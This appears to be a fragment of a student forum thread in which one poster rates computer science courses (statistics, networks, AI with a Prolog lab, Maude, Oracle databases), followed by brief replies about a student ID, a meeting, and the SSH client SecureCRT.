- statistics (good teacher, rubbish otherwise)
- computer networks (Java sockets, RMI and serialization, useful)
- software development methods (rubbish that every project has to go through)
- artificial intelligence (not sure exactly, Prolog lab)
- logic programming (lame prof, Maude lab, a weird but interesting language)
- databases (theory in lectures, Oracle lab)

That's all for now; if you want other information, ask.
  23. begood: Is it OK like this? Is that the ID? Nemessis: We have access to the database, I don't think there will be any problems. Anyway, most of us know each other. Or hell, let's just hold a meeting ourselves...
  24. SecureCRT.